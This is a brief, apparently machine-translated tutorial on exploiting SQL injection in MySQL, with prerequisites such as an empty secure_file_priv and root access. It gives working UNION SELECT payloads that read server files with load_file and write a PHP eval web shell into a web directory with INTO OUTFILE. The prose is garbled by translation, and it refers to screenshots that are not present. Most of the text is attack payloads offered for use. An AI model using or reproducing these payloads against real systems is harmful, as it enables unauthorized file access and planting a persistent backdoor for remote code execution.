Prerequisites

• The database needs to be opened secure_file_priv Will be secure_file_priv The value of is empty , It is not allowed to write if it is not empty webshell （ Not on by default , Need modification mysql The configuration file mysql.ini Or call it my.ini The configuration file ）
• Need to know the remote directory
• The remote directory needs to have write permission
• need mysql root jurisdiction

Turn on secure_file_priv Parameters , Operation diagram ：

Read the file

To read a file, you must know , File path , If you don't know, look for the address of the published middleware configuration file

union select 1,load_file(' File path ') -- bbq

For example, read the virtual machine boot.ini file ：

union select 1,load_file('c:\\boot.ini') -- bbq

Operation diagram ：

write file

Usually it's a pony like a kitchen knife , Then connect with a kitchen knife

union select " Trojan statement ",2 into outfile " Upload server file path " -- bbq

for example ： I write a kitchen knife and a sentence, pony file To C:\phpStudy\WWW\123.php Under the table of contents

union select "<?php @eval($_POST['123']);?>",2 into outfile "C:\\phpStudy\\WWW\\123.php" -- bbq

Operation diagram ：